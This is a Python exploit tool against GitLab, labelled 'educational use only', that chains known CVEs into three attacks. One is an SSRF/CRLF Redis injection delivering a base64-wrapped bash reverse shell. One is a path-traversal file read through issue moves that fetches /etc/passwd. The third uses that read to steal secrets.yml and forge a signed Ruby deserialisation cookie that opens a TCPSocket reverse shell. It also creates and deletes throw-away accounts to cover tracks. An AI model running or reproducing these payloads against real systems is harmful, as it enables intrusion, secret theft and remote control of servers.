|
""" |
|
Gitlab RCE+LFI version <= 11.4.7, 12.4.0-12.8.1 - EDUCATIONAL USE ONLY |
|
CVEs: CVE-2018-19571 (SSRF) + CVE-2018-19585 (CRLF) |
|
CVE-2020-10977 |
|
""" |
|
|
|
import base64 |
|
import hashlib |
|
import hmac |
|
from html.parser import HTMLParser |
|
import random |
|
import string |
|
import sys |
|
import time |
|
import urllib.parse |
|
import urllib3 |
|
|
|
import requests |
|
|
|
# The HTTP calls in this script pass verify=False (TLS certificate checks are
# skipped); silence the InsecureRequestWarning urllib3 would emit for them.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
|
|
|
|
|
class GitlabRCE:
    """Shared GitLab web-session helpers used by the variants in this file.

    Holds the target base URL, the local callback address/port and one
    ``requests`` session, and drives GitLab's HTML forms: register, sign in,
    create project, create issue and delete the account again.  Subclasses
    override :meth:`main` (and, where needed, :meth:`prepare_payload`).
    """

    description = "oopsie woopsie we made a fucky wucky a wittle fucko boingo!"

    def __init__(self, gitlab_url, local_ip):
        """Remember the target and callback address and open an HTTP session.

        Args:
            gitlab_url: Base URL of the GitLab instance; request paths are
                appended to it verbatim.
            local_ip: Address of the local machine, used by subclasses.
        """
        self.url = gitlab_url
        self.local_ip = local_ip
        self.port = 42069
        # change this if the gitlab has restricted email domains
        self.email_domain = "gmail.htb"
        self.session = requests.session()
        # Credentials of the throw-away account; filled in by register_user().
        self.username = ""
        self.password = ""
        # Names/titles of everything created during this run, in creation order.
        self.projects = []
        self.issues = []

    def get_authenticity_token(self, url, i=-1):
        """Fetch ``url`` and return one of the CSRF tokens found on the page.

        Args:
            url: Page to download with the current session.
            i: Index into the list of tokens found (default: the last one).

        Returns:
            The selected token.  If none is found the run is aborted via
            :meth:`abort`, which terminates the process.
        """
        result = self.session.get(url, verify=False)
        parser = GitlabParse()
        token = parser.feed(result.text, i)
        if not token:
            print("could not get token!")
            self.abort()
        return token

    def randomize(self):
        """Return a random 10-character string of ASCII letters and digits."""
        sequence = string.ascii_letters + string.digits
        return "".join(random.choices(sequence, k=10))

    def register_user(self):
        """Register an account with random username/password and print the status."""
        authenticity_token = self.get_authenticity_token(self.url + "/users/sign_in")
        self.username = self.randomize()
        self.password = self.randomize()
        email = "{}@{}".format(self.username, self.email_domain)
        data = {"new_user[email]": email, "new_user[email_confirmation]": email,
                "new_user[username]": self.username,
                "new_user[name]": self.username, "new_user[password]": self.password,
                "authenticity_token": authenticity_token}
        result = self.session.post(self.url + "/users", data=data, verify=False)
        print("registering {}:{} - {}".format(self.username, self.password, result.status_code))

    def login_user(self):
        """Sign in with the stored credentials and print the HTTP status code."""
        # Index 0: use the first token found on the sign-in page.
        authenticity_token = self.get_authenticity_token(self.url + "/users/sign_in", 0)
        data = {"authenticity_token": authenticity_token, "user[login]": self.username,
                "user[password]": self.password}
        result = self.session.post(self.url + "/users/sign_in", data=data, verify=False)
        print(result.status_code)

    def delete_user(self):
        """Delete the account created by :meth:`register_user` and print the status."""
        authenticity_token = self.get_authenticity_token(self.url + "/profile/account")
        # The form is POSTed with _method=delete in the body.
        data = {"authenticity_token": authenticity_token, "_method": "delete",
                "password": self.password}
        result = self.session.post(self.url + "/users", data=data, verify=False)
        print("delete user {} - {}".format(self.username, result.status_code))

    def create_empty_project(self):
        """Create a project with a random name and record it in ``self.projects``."""
        authenticity_token = self.get_authenticity_token(self.url + "/projects/new")
        project = self.randomize()
        self.projects.append(project)
        data = {"authenticity_token": authenticity_token, "project[ci_cd_only]": "false",
                "project[name]": project,
                "project[path]": project, "project[visibility_level]": "0",
                "project[description]": "all your base are belong to us"}
        result = self.session.post(self.url + "/projects", data=data, verify=False)
        print("creating project {} - {}".format(project, result.status_code))

    def create_issue(self, project_id, text):
        """Create an issue with a random title and ``text`` as its description.

        Args:
            project_id: Path name of the project (as stored in ``self.projects``).
            text: Issue description to submit.
        """
        issue_link = "{}/{}/{}/issues".format(self.url, self.username, project_id)
        authenticity_token = self.get_authenticity_token(issue_link + "/new")
        issue_title = self.randomize()
        self.issues.append(issue_title)
        data = {"authenticity_token": authenticity_token, "issue[title]": issue_title,
                "issue[description]": text}
        result = self.session.post(issue_link, data=data, verify=False)
        print("creating issue {} for project {} - {}".format(issue_title, project_id,
                                                             result.status_code))

    def main(self):
        """Placeholder entry point; subclasses provide the real flow."""
        print("main is not implemented")

    def prepare_payload(self):
        """Placeholder; subclasses that need a payload override this."""
        print("prepare_payload is not implemented")

    def abort(self):
        """Print a failure notice and terminate the process with exit status 1.

        Raises:
            SystemExit: always.
        """
        print("Something went wrong! ABORT MISSION!")
        # sys.exit() rather than the exit() helper: the latter is only injected
        # by the ``site`` module and is meant for the interactive shell.  The
        # non-zero status lets a calling shell detect the failure.
        sys.exit(1)
|
|
|
class GitlabRCE1147(GitlabRCE):
    """Variant advertised for GitLab <= 11.4.7 (see ``description``).

    Submits the new-project form with a crafted ``project[import_url]``.
    """

    description = "RCE for Version <=11.4.7"

    def exploit_project_creation(self, payload):
        """POST the new-project form with ``payload`` embedded in the import URL.

        Fetches a CSRF token from ``/projects/new``, substitutes ``payload``
        into the import-URL template and POSTs the form to ``/projects``.
        The random project name is recorded in ``self.projects`` and the HTTP
        status code is printed.

        Args:
            payload: Command string inserted at the ``{payload}`` placeholder.
        """
        authenticity_token = self.get_authenticity_token(self.url + "/projects/new")
        project = self.randomize()
        self.projects.append(project)
        # NOTE(review): the line breaks inside this literal are part of the
        # value that is sent; it is reproduced exactly as found - do not reflow.
        payload_template = """git://[0:0:0:0:0:ffff:127.0.0.1]:6379/
multi
sadd resque:gitlab:queues system_hook_push
lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"class_eval\\",\\"open(\\'|{payload} \\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"ad52abc5641173e217eb2e52\\",\\"created_at\\":1513714403.8122594,\\"enqueued_at\\":1513714403.8129568}"
exec
exec
exec"""
        # str.replace() instead of str.format(): the template contains literal
        # braces that format() would try to interpret as fields.
        payload = payload_template.replace("{payload}", payload)
        data = {"authenticity_token": authenticity_token, "project[import_url]": payload,
                "project[ci_cd_only]": "false", "project[name]": project,
                "project[path]": project, "project[visibility_level]": "0",
                "project[description]": "all your base are belong to us"}
        result = self.session.post(self.url + "/projects", data=data, verify=False)
        print("hacking in progress - {}".format(result.status_code))

    def prepare_payload(self):
        """Return the command string handed to :meth:`exploit_project_creation`.

        The inner bash command refers to ``self.local_ip`` and ``self.port``;
        it is base64-encoded and wrapped in an
        ``echo ... | base64 -d | /bin/bash`` pipeline.
        """
        payload = "bash -i >& /dev/tcp/{}/{} 0>&1".format(self.local_ip, self.port)
        wrapper = "echo {base64_payload} | base64 -d | /bin/bash"
        base64_payload = base64.b64encode(payload.encode()).decode("utf-8")
        payload = wrapper.format(base64_payload=base64_payload)
        return payload

    def main(self):
        """Register an account, submit the crafted project, wait, then clean up."""
        self.register_user()
        self.exploit_project_creation(self.prepare_payload())
        # NOTE(review): presumably gives the server time to act on the request
        # before the account is removed - confirm the 10 s figure.
        time.sleep(10)
        self.delete_user()
|
|
|
|
|
class GitlabRCE1281LFI(GitlabRCE):
    """File-read variant (see ``description``).

    Creates two projects, files an issue in the first one whose description
    is the link built by :meth:`lfi_path`, moves that issue to the second
    project and downloads the link found in the moved issue's description.
    """

    description = "LFI for version 10.4-12.8.1 and maybe more"

    def __init__(self, gitlab_url, local_ip, file_to_lfi="/etc/passwd"):
        """Initialise the base class and remember which server-side path to read."""
        super(GitlabRCE1281LFI, self).__init__(gitlab_url, local_ip)
        self.file_to_lfi = file_to_lfi

    def get_file(self, url, filename):
        """GET ``url`` with the session and return the response body as text.

        ``filename`` is only used for the progress message.
        """
        print("Grabbing file {}".format(filename))
        result = self.session.get(url, verify=False)
        return result.text

    def get_technical_id_of_project(self, project_id):
        """Return the numeric id scraped from the project's page.

        Args:
            project_id: Path name of the project under the current user.

        Returns:
            The integer found by ``ProjectIDParse``, or ``None`` if the page
            did not contain one.
        """
        url = "{}/{}/{}".format(self.url, self.username, project_id)
        result = self.session.get(url, verify=False)
        parser = ProjectIDParse()
        technical_id = parser.feed(result.text)
        return technical_id

    def extract_link_from_issue_json(self, issue_json, project_id):
        """Pull the markdown link out of an issue's ``description`` field.

        Args:
            issue_json: Decoded JSON object; must contain ``"description"``.
            project_id: Path name of the project the link belongs to.

        Returns:
            ``(url, file_name)``: the text between the first ``(`` and the
            first ``)`` appended to ``<base>/<username>/<project_id>``, and
            the text between the first ``[`` and the first ``]``.
        """
        field = issue_json["description"]
        file_name = field[field.find("[") + 1:field.find("]")]
        file_path = field[field.find("(") + 1:field.find(")")]
        url = "{}/{}/{}{}".format(self.url, self.username, project_id, file_path)
        return url, file_name

    def lfi_path(self):
        """Return the markdown image link used as the issue description.

        The link target starts at ``/uploads/<32 x "1">/``, continues with a
        run of ``../`` segments and ends with ``self.file_to_lfi``.
        """
        return "![a](/uploads/11111111111111111111111111111111/../../../../../../../../../../../../../..{})".format(
            self.file_to_lfi)

    def exploit_move_issue(self):
        """Move issue #1 of the first project to the last one and fetch its link.

        Returns:
            The text body downloaded from the link in the moved issue.
        """
        project = self.projects[0]
        other_project = self.projects[-1]
        # Issue number 1 is hard-coded: the first issue created in ``project``.
        url = "{}/{}/{}/issues/1".format(self.url, self.username, project)
        technical_project_id_other_project = self.get_technical_id_of_project(other_project)
        authenticity_token = self.get_authenticity_token(url)
        issue_json = {"move_to_project_id": technical_project_id_other_project}
        # Set on the session, so these headers also apply to every later request.
        self.session.headers["X-CSRF-Token"] = authenticity_token
        self.session.headers["Referer"] = url
        result = self.session.post(url + "/move", json=issue_json, verify=False)
        print("moving issue from {} to {} - {}".format(project, other_project, result.status_code))
        url, filename = self.extract_link_from_issue_json(result.json(), other_project)
        file_content = self.get_file(url, filename)
        return file_content

    def main(self):
        """Run the whole flow, print the retrieved content and delete the account."""
        self.register_user()
        # Two projects are needed: a source and a destination for the move.
        self.create_empty_project()
        self.create_empty_project()
        self.create_issue(self.projects[0], self.lfi_path())
        file_content = self.exploit_move_issue()
        print(file_content)
        self.delete_user()
|
|
|
|
|
class GitlabRCE1281RCE(GitlabRCE1281LFI):
    """Variant that reuses the inherited file read to obtain ``secret_key_base``
    and then sends a signed cookie (see ``description``; marked WIP by the author).
    """

    description = "RCE for version 12.4.0-12.8.1 - !!RUBY REVERSE SHELL IS VERY UNRELIABLE!! WIP"

    def parse_secrets(self, secrets):
        """Cut the ``secret_key_base`` value out of the secrets file text.

        Takes everything from just after ``"secret_key_base: "`` (17
        characters) up to three characters before ``"otp_key_base"``.
        """
        secret_key_base = secrets[secrets.find("secret_key_base: ") + 17:secrets.find("otp_key_base") - 3]
        return secret_key_base

    def get_ruby_shit_byte(self):
        """Return one character of ``"jklmnopqrstuvw"`` chosen by address length.

        The index is ``len(local_ip) + len(str(port)) - 8``.
        """
        # NOTE(review): per the author's original remark this relates to Ruby's
        # marshal format - presumably a length marker for the embedded string;
        # confirm before changing.
        length = len(self.local_ip) + len(str(self.port)) - 8
        possible_shit_bytes = "jklmnopqrstuvw"
        return possible_shit_bytes[length]

    def build_payload(self, secret):
        """Fill in the payload template and sign it with a key derived from ``secret``.

        Args:
            secret: The ``secret_key_base`` string.

        Returns:
            ``"<base64 payload>--<hex HMAC-SHA1 digest>"``.
        """
        # Byte-exact template; the placeholders are substituted with
        # str.replace() because the literal itself contains braces.
        payload = "\x04\bo:@ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy\t:\x0E@instanceo:\bERB\b:\t@srcI\"{ruby_shit_byte}exit if fork;c=TCPSocket.new(\"{ip}\",{port});while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end\x06:\x06ET:\x0E@filenameI\"\x061\x06;\tT:\f@linenoi\x06:\f@method:\vresult:\t@varI\"\f@result\x06;\tT:\x10@deprecatorIu:\x1FActiveSupport::Deprecation\x00\x06;\tT"
        payload = payload.replace("{ip}", self.local_ip).replace("{port}", str(self.port)).replace("{ruby_shit_byte}",
                                                                                                   self.get_ruby_shit_byte())
        # 64-byte key: PBKDF2-HMAC-SHA1 over the secret, salt b"signed cookie",
        # 1000 iterations.
        key = hashlib.pbkdf2_hmac("sha1", password=secret.encode(), salt=b"signed cookie", iterations=1000, dklen=64)
        base64_payload = base64.b64encode(payload.encode())
        # The signature covers the base64 text, not the raw payload.
        digest = hmac.new(key, base64_payload, digestmod=hashlib.sha1).hexdigest()
        return base64_payload.decode() + "--" + digest

    def send_payload(self, payload):
        """GET ``/users/sign_in`` with ``payload`` as the ``experimentation_subject_id`` cookie."""
        cookie = {"experimentation_subject_id": payload}
        result = self.session.get(self.url + "/users/sign_in", cookies=cookie, verify=False)
        print("deploying payload - {}".format(result.status_code))

    def main(self):
        """Read the secrets file, build and send the signed cookie, then clean up."""
        # Overrides whatever path was given to the constructor.
        self.file_to_lfi = "/opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml"
        self.register_user()
        self.create_empty_project()
        self.create_empty_project()
        self.create_issue(self.projects[0], self.lfi_path())
        file_contents = self.exploit_move_issue()
        secret = self.parse_secrets(file_contents)
        payload = self.build_payload(secret)
        self.send_payload(payload)
        self.delete_user()
|
|
|
|
|
class GitlabRCE1281LFIUser(GitlabRCE1281LFI):
    """Interactive flavour of the file-read flow: asks for the path first."""

    def main(self):
        """Prompt for the path to read, store it, then run the inherited flow."""
        chosen_path = self.ask_for_lfi_path()
        self.file_to_lfi = chosen_path
        super().main()

    def ask_for_lfi_path(self):
        """Ask the user for a path on stdin.

        Returns:
            The stripped answer, or the current ``self.file_to_lfi`` when the
            answer is empty or only whitespace.
        """
        prompt = "please type in the fully qualified path of the file you want to LFI. Uses {} when left empty: ".format(
            self.file_to_lfi)
        answer = input(prompt).strip()
        return answer if answer else self.file_to_lfi
|
|
|
|
|
class GitlabVersion(GitlabRCE):
    """Reachability check and version lookup against the target's ``/help`` page."""

    def test(self):
        """Abort the run unless the base URL answers with HTTP 200 or 302.

        Connection-level failures reported by ``requests`` are printed and
        lead to :meth:`abort`, as does any other status code.
        """
        try:
            result = self.session.get(self.url, verify=False)
        except requests.RequestException as e:
            # Only transport/URL errors are expected here; anything else is a
            # programming error and should surface with a traceback.
            print(e)
            self.abort()
            return
        if result.status_code not in (200, 302):
            print("Host {} seems down".format(self.url))
            self.abort()

    def get_version(self):
        """Fetch ``/help`` and return the version text found there.

        Returns:
            The text extracted by ``VersionParse``, or ``None`` if the page
            contained no version link.
        """
        result = self.session.get(self.url + "/help", verify=False)
        print("Getting version of {} - {}".format(self.url, result.status_code))
        parse = VersionParse()
        version = parse.feed(result.text)
        return version

    def main(self):
        """Check the host, register a temporary account, report the version.

        The temporary account is always deleted before a possible abort.
        """
        self.test()
        self.register_user()
        version = self.get_version()
        # Announce the version only when one was actually found; previously
        # "The Version seems to be None!" was printed on failure.
        if version:
            print("The Version seems to be {}! Choose wisely".format(version))
        self.delete_user()
        if not version:
            print("Could not get version!")
            self.abort()
|
|
|
|
|
class GitlabParse(HTMLParser):
    """Collect CSRF tokens from an HTML page.

    Tokens are gathered in document order from
    ``<input name="authenticity_token" value="...">`` and
    ``<meta name="csrf-token" content="...">`` tags, regardless of the order
    in which the attributes appear inside the tag.
    """

    def __init__(self):
        super().__init__()
        # Every token found so far, in document order.
        self.tokens = []
        # Kept for backward compatibility only; the parser no longer relies
        # on state carried from one attribute (or tag) to the next.
        self.current_name = ""

    def handle_starttag(self, tag, attrs):
        """Record the token carried by a matching ``input`` or ``meta`` tag."""
        # Looking attributes up by name avoids depending on their order and
        # prevents a match from leaking into the following tag.
        attributes = dict(attrs)
        if tag == "input" and attributes.get("name") == "authenticity_token":
            token = attributes.get("value")
        elif tag == "meta" and attributes.get("name") == "csrf-token":
            token = attributes.get("content")
        else:
            return
        # A value-less attribute is reported as None by HTMLParser.
        if token is not None:
            self.tokens.append(token)

    def feed(self, data, i):
        """Parse ``data`` and return the ``i``-th token found so far.

        Args:
            data: HTML text.
            i: List index into the collected tokens (negative values count
                from the end).

        Returns:
            The selected token, or ``None`` when the index is out of range.
        """
        super().feed(data)
        try:
            return self.tokens[i]
        except IndexError:
            return None
|
|
|
|
|
class ProjectIDParse(HTMLParser):
    """Extract the integer ``value`` of the element with ``id="project_id"``."""

    def __init__(self):
        super().__init__()
        # True once an element with id="project_id" has been seen.
        self.project_found = False
        # Parsed id, or None while nothing usable has been found.
        self.project_id = None

    def feed(self, data):
        """Parse ``data`` and return the project id found so far (or ``None``)."""
        super().feed(data)
        return self.project_id

    def handle_starttag(self, tag, attrs):
        """Store the numeric ``value`` of a tag whose ``id`` is ``project_id``."""
        # Name-based lookup: independent of attribute order, and no state is
        # carried over into unrelated tags that follow.
        attributes = dict(attrs)
        if attributes.get("id") != "project_id":
            return
        self.project_found = True
        raw_value = attributes.get("value")
        if raw_value is None:
            return
        try:
            self.project_id = int(raw_value)
        except ValueError:
            # Non-numeric value: keep whatever id was found before instead of
            # crashing the whole parse.
            return
|
|
|
|
|
class VersionParse(HTMLParser):
    """Return the text of the first link whose ``href`` contains ``/tags/v``."""

    def __init__(self):
        super().__init__()
        # True while the most recent <a> tag pointed at a "/tags/v..." URL.
        self.found_version = False
        # First text chunk seen after such a link; None until then.
        self.version = None

    def handle_starttag(self, tag, attrs):
        """Flag whether the current ``<a>`` tag links to a version tag."""
        if tag != "a":
            return
        # Check every attribute instead of letting the last one decide, so
        # the link is recognised wherever href sits inside the tag.  A
        # value-less href is reported as None and must not be searched.
        self.found_version = any(
            name == "href" and value is not None and "/tags/v" in value
            for name, value in attrs
        )

    def handle_data(self, data):
        """Capture the first text chunk that follows a version link."""
        if self.found_version and not self.version:
            self.version = data

    def feed(self, data):
        """Parse ``data`` and return the captured version text (or ``None``)."""
        super().feed(data)
        return self.version
|
|
|
|
|
class Runner:
    """Command-line driver: reads ``sys.argv``, shows the menu, runs the choice.

    Instantiating the class immediately starts the run.
    """

    def __init__(self):
        self.available_classes = [GitlabRCE1147, GitlabRCE1281LFIUser, GitlabRCE1281RCE]
        self.local_ip = None
        self.gitlab_url = None
        self.run()

    def banner(self):
        """Print the one-line banner."""
        print("Gitlab Exploit by dotPY [insert fancy ascii art]")

    def get_version(self):
        """Run the version lookup against the configured target."""
        GitlabVersion(self.gitlab_url, self.local_ip).main()

    def list_options_and_choose(self):
        """Print the numbered menu and keep asking until a valid index is typed.

        Returns:
            The class selected from ``self.available_classes``.
        """
        for index, candidate in enumerate(self.available_classes):
            print("[{}] - {} - {}".format(index, candidate.__name__, candidate.description))

        valid_indices = range(len(self.available_classes))
        choice = None
        while choice not in valid_indices:
            try:
                choice = int(input("type a number and hit enter to choose exploit: "))
            except ValueError:
                # Not a number: ask again.
                continue
        return self.available_classes[choice]

    def run_chosen_exploit(self, chosen_exploit):
        """Instantiate the chosen class, wait for the user, then run it."""
        instance = chosen_exploit(self.gitlab_url, self.local_ip)
        prompt = "Start a listener on port {port} and hit enter (nc -vlnp {port})".format(port=instance.port)
        input(prompt)
        instance.main()

    def run(self):
        """Validate the command line; start the run or print the usage line."""
        argv = sys.argv
        if len(argv) == 3:
            self.gitlab_url = argv[1]
            self.local_ip = argv[2]
            self.start()
            return
        print("usage: {} <http://gitlab:port> <local-ip>".format(argv[0]))

    def start(self):
        """Banner, version lookup, menu, then the selected class."""
        self.banner()
        self.get_version()
        selected = self.list_options_and_choose()
        self.run_chosen_exploit(selected)
|
|
|
|
|
# Only start the interactive run when executed as a script; importing the
# module (for reuse or inspection) must not parse sys.argv or prompt the user.
if __name__ == "__main__":
    r = Runner()